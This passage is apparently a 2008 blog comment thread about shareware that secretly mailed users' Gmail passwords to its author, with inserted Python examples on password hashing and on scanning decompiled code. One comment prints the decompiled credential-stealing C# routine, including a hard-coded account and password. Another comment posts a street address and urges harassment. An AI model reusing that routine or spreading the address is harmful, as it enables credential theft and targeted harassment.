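```python
import hashlib
import hmac
import os

# Constructed in-memory "user tables" for the example; a real site would persist these.
# Each maps username -> stored record.

def register_plaintext(store: dict, username: str, password: str) -> None:
    """The weak pattern Robin describes: the site keeps the password itself.
    Anything stored this way can be mailed back to the user in clear text
    (and read by anyone who gets at the table or the mail)."""
    store[username] = password


def verify_plaintext(store: dict, username: str, password: str) -> bool:
    return store.get(username) == password


def register_hashed(store: dict, username: str, password: str,
                    iterations: int = 200_000) -> None:
    """The sound pattern: keep a random per-user salt and a PBKDF2-HMAC-SHA256
    digest. The record cannot be turned back into the password, so the site
    has no plaintext to email, and a stolen table yields only work for an attacker."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    store[username] = {"salt": salt, "iterations": iterations, "digest": digest}


def verify_hashed(store: dict, username: str, password: str) -> bool:
    record = store.get(username)
    if record is None:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    record["salt"], record["iterations"])
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(candidate, record["digest"])


def can_email_password_back(store: dict, username: str) -> bool:
    """True only when the stored record is the password itself, i.e. when the
    site is in a position to do what Robin complains about."""
    return isinstance(store.get(username), str)


if __name__ == "__main__":
    weak, sound = {}, {}
    register_plaintext(weak, "alice", "correct horse battery staple")
    register_hashed(sound, "alice", "correct horse battery staple")
    print("plaintext site can mail it back:", can_email_password_back(weak, "alice"))
    print("hashed site can mail it back:   ", can_email_password_back(sound, "alice"))
    print("hashed login still works:       ", verify_hashed(sound, "alice", "correct horse battery staple"))
```

The design point is that the hashed table still answers the only question a login needs ("is this the password?") while making the question Robin's sites answer ("what is the password?") unanswerable.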

from BrotherSoft site:
BrotherSoft.com is not only a website for software downloading, we also evaluate the software based on our established evaluation criteria, which is submitted by developer. And we will also give the software developer an honest opinion. Our original intention is that our evaluation could help the software developer provide a better one for their customers.
(auhuahuahuahuhauahuhauhauhau)

marco borgna on March 10, 2008 03:16 AM

Actually John Terry is a quite famous guy.
http://www.chelseafc.com/page/ThePlayers/0,,10268~5593,00.html

Name is most probably just bogus - especially if this was intent.

Petter Jensen on March 10, 2008 03:59 AM

I never found a decent email archive program so I wrote one in Python about a year ago, it downloads your emails to text files (saves the extensions too). I figure there might be some people looking for a decent, simple email archiver so I threw it online. You can find it here...

http://lab.noopsi.com/popbak/

Jeff, I hope it is okay to post a link like this. I polished the script over the weekend because after reading this post on Friday I figured there might be some people looking for a new email backup utility. Also, since it is written in Python there aren't any secret surprises since you can see everything Popbak does.

Jaymon on March 10, 2008 04:04 AM

It looks like from his password "bilal482" which is an asian name, his name might not be John Terry at all.

Amit on March 10, 2008 05:16 AM

Umm...let me get this straight -

You want to back up your email, which contains a bunch of sensitive data. Rather than back it up securely on your own machine or device (which can be done in, probably, thousands of different ways), you decide to download some random application that was written by someone you don't know, and then blissfully punch your username and password into it.

Can we please stop talking about heroes and villains and start talking about stupidity?

Terry on March 10, 2008 05:23 AM

@David W: The garchiver site is still "up", but the "Free Download" and "Buy now" links have been removed. I guess that's better than nothing, under the circumstances.

- Roddy

Roddy on March 10, 2008 05:26 AM

I don't know about in the USA but in the UK this would actually be illegal as it would fall under our data protection act. Basically no one can store your information without letting you know first then they must remove it after it has become unreasonable to keep (likely out of date, not needed etc..). It is also their responsibility to hold it securely.

pete on March 10, 2008 05:41 AM

using System;
using System.Net;
using System.Net.Mail;
using System.Text;

public class Mail
{
    // Methods
    // Decompiled (Reflector) output of the routine Dustin describes: the
    // user's Gmail username (a) and password (b) are mailed to the author's
    // own account, using the author's hard-coded credentials to send.
    public static void CheckConnection(string a, string b)
    {
        try
        {
            MailMessage message = new MailMessage();
            // Recipient and sender are the same hard-coded mailbox.
            message.To.Add("JTerry79@gmail.com");
            message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
            message.Subject = "Account";
            message.SubjectEncoding = Encoding.UTF8;
            // The user's credentials go into the body in clear text.
            message.Body = "Username: " + a;
            message.Body = message.Body + "\r\nPassword: " + b;
            message.BodyEncoding = Encoding.UTF8;
            message.IsBodyHtml = false;
            message.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient();
            // The author's own Gmail password, embedded in the shipped binary.
            client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
            client.Port = 0x24b; // 587, Gmail's STARTTLS submission port
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            client.Send(message);
        }
        catch (Exception)
        {
            // Any failure is swallowed silently, so the user never sees
            // a sign that a message was sent or attempted.
        }
    }
}

Brian on March 10, 2008 06:07 AM
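For anyone who, as Rob suggests above, fires up Reflector on shareware before trusting it with an account, the decompiled routine Brian posted shows exactly the combination worth looking for: a hard-coded sending credential, a hard-coded recipient, user-supplied secrets concatenated into a mail body, an outbound send, and an empty catch that hides failures. The scanner below is an added example in Python, not code from the post or from Brian or Dustin; it runs a few line-oriented rules over a constructed C# sample that follows the same shape (the addresses, host and password in the sample are placeholders, not the real values from the thread), and the rule and function names are hypothetical.

```python
import re
from typing import List, Tuple

# Constructed sample of decompiled C#, modelled on the pattern in the thread.
# Addresses, host and password are placeholders, not the real ones.
SAMPLE_DECOMPILED = """\
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        message.To.Add("dropbox@example.com");
        message.Subject = "Account";
        message.Body = "Username: " + a;
        message.Body = message.Body + "\\r\\nPassword: " + b;
        SmtpClient client = new SmtpClient();
        client.Credentials = new NetworkCredential("dropbox@example.com", "hunter2");
        client.Host = "smtp.example.com";
        client.Send(message);
    }
    catch (Exception)
    {
    }
}
"""

# Constructed benign contrast: credentials come from configuration, not literals,
# and no mail is sent.
BENIGN_SAMPLE = """\
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential(settings.User, settings.Password);
client.Host = settings.Host;
"""

# Each rule is (name, regex applied to a single source line).
RULES = [
    # new NetworkCredential("literal", "literal") -> secret baked into the binary
    ("hardcoded-credential",
     re.compile(r'new\s+NetworkCredential\s*\(\s*"[^"]*"\s*,\s*"[^"]*"')),
    # .To.Add("literal") -> mail always goes to one fixed mailbox
    ("hardcoded-mail-recipient",
     re.compile(r'\.To\.Add\s*\(\s*"[^"]+"\s*\)')),
    # a "Username:"/"Password:" label concatenated with a variable into a mail body
    ("user-secret-in-mail-body",
     re.compile(r'\.Body\b.*"[^"]*(?:Password|Username)[^"]*"\s*\+\s*\w+', re.IGNORECASE)),
    # the message actually leaves the machine
    ("outbound-smtp-send",
     re.compile(r'\.Send\s*\(')),
]


def scan_source(source: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule name, stripped line) for every hit."""
    findings = []
    lines = source.splitlines()
    for number, line in enumerate(lines, start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((number, name, line.strip()))
    # An empty catch needs three lines of context: "catch (...)", "{", "}".
    for i in range(len(lines) - 2):
        if (re.match(r'\s*catch\s*\(', lines[i])
                and lines[i + 1].strip() == "{"
                and lines[i + 2].strip() == "}"):
            findings.append((i + 1, "swallowed-exception", lines[i].strip()))
    return sorted(findings)


def rule_names(findings: List[Tuple[int, str, str]]) -> List[str]:
    return sorted({name for _, name, _ in findings})


def is_credential_exfiltration(findings: List[Tuple[int, str, str]]) -> bool:
    """The combination that matters: a baked-in sending account, user secrets
    placed in a mail body, and an actual send. Any one alone can be innocent."""
    needed = {"hardcoded-credential", "user-secret-in-mail-body", "outbound-smtp-send"}
    return needed <= set(rule_names(findings))


if __name__ == "__main__":
    for number, name, text in scan_source(SAMPLE_DECOMPILED):
        print(f"line {number:2d}  {name:26s}  {text}")
    print("looks like credential exfiltration:",
          is_credential_exfiltration(scan_source(SAMPLE_DECOMPILED)))
```

The rules are deliberately crude line matchers; they are meant as a checklist for a human reading decompiled output, not as a substitute for reading it, and a program that reads its SMTP credentials from configuration (the benign sample) produces no hits at all.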

Granted my actions may have been a little quick and harsh, I was a little upset over the whole deal. I have a lot of personal info in my account along with a stored credit card for google checkout.
I very easily just could have changed my password and been done with it, but I didn't want more people compromising their accounts as well.
The only emails in this account were usernames/passwords. This wasn't a personal account used for other things.
The only thing I worry about now is his account getting restored from Gmail. Does anyone have a good way to contact them? I sent something through their "suggestions form," because it was the only one I could find.

Dustin on March 10, 2008 06:21 AM

I don't think you were too quick or too harsh Dustin. I think you did exactly the right thing and as others have said I would have contacted GMail and the FBI (since it's interstate fraud).

I don't think a wholesale abandoning of shareware is the answer. Nor is open source. While this may seem like a smoking gun for the case of open source let's not be so reactionary. There are many, many honest software developers that release their software as shareware to get their product on people's desktops.

You wouldn't say, "I stubbed my toe on the kitchen table so we must outlaw all tables... and toes."

Kaitain on March 10, 2008 06:47 AM

I haven't read all the posts, but I'll try to answer a few more questions.
Yes, I did kind of screw up by downloading some random software and I'll take the idiot card for that. I was essentially looking for something that would backup the gmail emails in their entirety. I use the labels almost religiously on everything in my box and wanted a way to keep those intact (which by the way Thunderbird will kind of do using IMAP, so yay).
Since this program wasn't going to cut it, I wanted to see how much code went into getting it this far in case I was going to be forced to try and write something myself. I've used Reflector on a lot of things, that doesn't mean I've stolen other people's code, claimed it as my own, sold it on the black market and killed puppies as some people seem to think.
Oh, and a lot of the emails had been opened. And there is absolutely no reason to have a debug function to email the username and password of a gmail account, to another gmail account.
And to email all the affected accounts would mean getting each name individually off the body of the message. They were sent from jterry to jterry, so they weren't added to his contacts.

Dustin on March 10, 2008 06:56 AM

You should submit that to thedailywtf.com

David on March 10, 2008 07:51 AM

You know, skimming the comments after getting here from Daring Fireball, I'm surprised nobody brought up this classic...

http://cm.bell-labs.com/who/ken/trust.html

Des Courtney on March 10, 2008 08:09 AM

Hey, how about blurring/mosaicing out the 10 or so gmail names that are in that screenshot?

Too late. They'll now get even more spam.

Man chowda on March 10, 2008 08:09 AM

@Dustin:

In case you decide to delete John Terry's google account,
http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=32046

Anonymous on March 10, 2008 08:19 AM

Ryan,

Well, the jury's still out on whether you're an idiot, so no worries. :-D

Eric on March 10, 2008 08:47 AM

Technically, there should be no need for JTerry to have included his own login credentials in his code. I absolutely guarantee that GMail does not require any authentication for inbound emails. It is completely trivial to send a message via SMTP (the protocol is completely text based and can be used via a telnet program). MIME headers and formatting are not required.

smbarbour on March 10, 2008 09:23 AM

Excellent work man, its good to have people like you around.

kefka on March 10, 2008 09:51 AM

erm... are you familiar with the concept of "POP mail". when you can pop your gmail down for free.. why were you looking for an alternative to backup your emails???

mansoor on March 10, 2008 09:58 AM

Oh, very unpleasant.

GUmy on March 10, 2008 10:00 AM

It looks like G-archiver has been taken down from all of the shareware download sites, as well as the G-archiver website itself. Does anyone still have a link to the original executable? I would love to peruse the decompiled source code for myself.

DBrant on March 10, 2008 10:13 AM

I agree with Domenic. DPAPI does not solve all problems. Is there a way the writer of this program could have used DPAPI? Wouldn't the installer at least need the password in plain text so that DPAPI could encrypt it specifically for the machine the software was installed on?

Marc on March 10, 2008 10:21 AM

Open source ftw?

Petras on March 10, 2008 10:50 AM

This is kind of a catch-22: why would Dustin log into John's account without breaking some sort of ethics? If I were Dustin I would have done the same thing. But imagine if he logged into his email account and there was nothing?

Jesus DeLaTorre on March 10, 2008 10:59 AM

-- We use Lutz as a verb. "Let's lutz it and find out"

I'm having that one David. Duly adopted.


I'm very skeptical of any third-party site or application that asks for username and password. These days access to your e-mail account gives a person access to your entire life.

Moral of the story: Trust No One.

Derek on March 10, 2008 11:14 AM

> What about working for a company like Raytheon, whose job is to
> build better killing machines? Would you consider that ethically
> defensible? That would seem to violate principles 1 and 2. Or, what
> about working for an online gambling site? I'm just curious as to
> where you would draw the line.

I think that at some point it has to come down to your own moral compass. I've worked in and around the defense industry my whole career. The thing is, the industry is about a whole lot more than just killing. For instance, I've done projects for NASA, which is about the most noble work I think a software engineer can be involved in. I've worked on flight simulators which keep pilots from *dying* from their mistakes while they are learning to fly. I've worked on shipboard engine controllers, which are what helps keep our sailors alive when the chips are down.

On the other hand, I have had two situations where I had to put my foot down. The first was a tank simulator for the Chinese army about 5 years after Tiananmen. (Two ways I'm doing that: no way, and no f'n way!)

The second was a job offer I got for building smartbombs.

Not that I'm being judgemental here. I'm sure there are some people who could sit in a chair at the retirement home at the end of their career and be proud of a life spent building bombs. After all, a properly coded one probably causes less collateral damage and deaths than conventional bombs to produce the same effect. However, I am not one of those people.

T.E.D. on March 10, 2008 11:16 AM

Here is where this douche bag lives:

10431 SW 88TH STREET SUITE D309, MIAMI FL 33176

Everyone send pizza and plumbers there.

TED on March 10, 2008 11:27 AM

I think people are confusing that this is all the work of Jeff because of a few reasons:

1. The way Jeff puts a light colored block and alignment in paraphrased text is sometimes hard to notice. It is done nicely, but too nicely to differentiate.

2. Language Jeff used is buried between two paraphrases.

Personally I have found such entries quite confusing but appreciate that since I don't read all feeds, Jeff's is kind of digg to me, which helps me get such interesting content.

Ketan

Ketan on March 10, 2008 11:41 AM

I blogged about this kind of behavior once before, but the *message* got lost. This is *exactly* the sort of thing I was talking about:

http://eddiesguy.blogspot.com/2007/08/heroes-villains-and-software.html

Mike Hofer on March 10, 2008 12:04 PM

I tend to agree with what Dave said, was Jeff's action not taking the law into his own hands?

However on the other hand, well done Jeff on writing this post. This type of programmer behaviour is criminal and leads to a total invasion of one's privacy.

As much as there are ethics and hopefully the majority of professionals follow them, there is always the criminal mind. I am of the opinion that the industry should be more regulated and programmers held accountable for malicious code. I know this is an impossible ask, but would it not be nice?

Brett on March 10, 2008 12:49 PM

Kudos!

jp on March 10, 2008 12:54 PM

Count me in the "mostly did the right thing" camp:

- Reflector: does anyone who doesn't wear a suit really think "reading the directions" is a crime? (This doesn't pardon plagiarism or other unsavory *use* of what you see, but the act of looking?). No harm was done here.

- Google: I probably wouldn't have deleted the emails (given a few minutes to think about it). Best practice probably is:
1. Check for email forward.
2. Add email forward to auto-reply warning that their information is being compromised. Cc abuse@google.com (or some other suitable email)
3. If there's an easy way to auto-reply to existing victims, do the same for them.
4. Change the passwords, security keys, and whatever else I can find.
5. Send an email to abuse@google.com (or whatever email I find) *from that account* detailing the situation and actions taken.
6. Log out, and find a better way to backup email. :)

Everyone who can be informed is informed, perp is locked out - but if it turns out to be some massive misunderstanding *snicker* nothing irreversible has been done, and I am relatively anonymous (if someone decides to go all Gestapo on "the big bad hacker") Not bothering to contact police - Google'll do it if there's a chance of prosecution.

Suggestions?

Allen on March 10, 2008 01:23 PM

It looks like it really could have been a mistake:
http://www.garchiver.com/what-happened.htm

Since the method is called "TestConnection" this is even somewhat plausible. Seriously, I bet there are programmers here who have leaked their own credentials this way.

It's still pretty stupid, though... ugh.

Jess Sightler on March 10, 2008 01:56 PM

no

jeep on March 10, 2008 02:04 PM

"What happened was that a member of our development team had inserted coding used for testing G-Archiver in the debug version and forgot to delete it in the final release version."

Riiiiight...

Somehow I doubt that it takes a "development team" to write this piece of blatant malware.

DBrant on March 10, 2008 02:06 PM